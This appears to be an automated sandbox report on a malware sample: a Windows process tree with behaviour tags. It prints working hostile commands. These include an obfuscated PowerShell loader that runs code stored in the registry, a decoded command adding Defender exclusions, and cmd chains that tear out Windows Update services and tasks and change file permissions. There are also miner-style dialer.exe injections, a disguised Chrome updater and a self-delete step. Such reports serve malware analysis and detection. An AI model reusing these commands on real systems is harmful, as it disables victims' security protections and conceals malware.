    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 3856 wrote to memory of 2500 | 3856 | powershell.EXE | dllhost.exe
    PID 212 wrote to memory of 1848 | 212 | cmd.exe | reg.exe
    PID 212 wrote to memory of 1848 | 212 | cmd.exe | reg.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{70ee3c05-9b85-43e0-b203-6f15f48c5757}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{426c058d-46e0-41b6-8f7d-ffa63b0d6b95}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAdwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAaQB0ACMAPgA="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe (depth 4)
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\Conhost.exe (depth 5)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\sc.exe (depth 5)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (depth 5)
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe (depth 5)
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe (depth 4)
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\Conhost.exe (depth 5)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\powercfg.exe (depth 5)
Command line: powercfg /x -hibernate-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (depth 5)
Command line: powercfg /x -hibernate-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (depth 5)
Command line: powercfg /x -standby-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (depth 5)
Command line: powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\dialer.exe (depth 4)
Command line: C:\Windows\System32\dialer.exe "fotenqffsdg"
-
C:\Windows\System32\dialer.exe (depth 4)
Command line: C:\Windows\System32\dialer.exe yggqxvaxzgtmmnu0 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
-
C:\Windows\System32\dialer.exe (depth 4)
Command line: C:\Windows\System32\dialer.exe yggqxvaxzgtmmnu1 XofLACsdV31j9ZQMDeZoqCpNDgH0IbRDCo8NYw9+P4ISyhmBaEKZj/pCrFzqeglJuGJVePitxQ1seLOAXl7jWWqXK+zOrqa2LmfHXb1cPkhd1J50U99RQ61Gyog4XK27/XTKo0f9OmcXDDPP9C48Ue7GZsz87KETDZ5qD/Yaq1lB35GEx/fRQAGrjdVEa0u7JPhfVtNRFtP1XBlwVUEgxsufEEfeQMI5wTmbbTssPqyRBa9iiWu+72oSNhkbSwWZcuQ2UAgyeaUjxbtJ0D2znd9Y++tdpAWuo5aLo0IzHXZhNVbYmhUQJYD+wnHENe+14/exahTwHPq/jdb503ZCEWJvf3Rvhi52ecxgli8y+ICndzv7ONBqBKvBj1Mu1X47SAlkpCck5/xJqFvaPG5cIq3h/y80diKSbPokVDWnEa/rMyTVTPRzyu+sagweTAfH7BqvN6UeRhHhphz3iAeobA==
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
-
C:\Windows\system32\DllHost.exe (depth 1)
Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
Command line: C:\Windows\system32\WerFault.exe -u -p 3388 -s 732
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exe (depth 2)
Command line: C:\Windows\system32\WerFault.exe -pss -s 484 -p 3388 -ip 3388
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
Command line: C:\Windows\system32\WerFault.exe -pss -s 472 -p 3280 -ip 3280
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k netsvcs -p
-
C:\Windows\system32\SppExtComObj.exe (depth 1)
Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\DllHost.exe (depth 1)
Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
Command line: C:\Windows\system32\WerFault.exe -u -p 3280 -s 952
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
-
C:\Windows\Explorer.EXE (depth 1)
Command line: C:\Windows\Explorer.EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
Decoded (UTF-16LE base64): <#xfq#> Add-MpPreference <#wam#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zydi#> -Force <#iul#>
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (depth 3)
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe (depth 4)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\sc.exe (depth 4)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 4)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 4)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 4)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 4)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (depth 4)
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe (depth 4)
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 4)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe (depth 3)
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exe (depth 4)
Command line: powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (depth 4)
Command line: powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (depth 4)
Command line: powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (depth 4)
Command line: powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exe (depth 3)
Command line: C:\Windows\System32\conhost.exe
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (depth 3)
Command line: "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
-
C:\Windows\System32\Conhost.exe (depth 4)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\choice.exe (depth 4)
Command line: choice /C Y /N /D Y /T 3
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
-
C:\Windows\system32\sihost.exe (depth 1)
Command line: sihost.exe
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
-
C:\Windows\System32\spoolsv.exe (depth 1)
Command line: C:\Windows\System32\spoolsv.exe
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
-
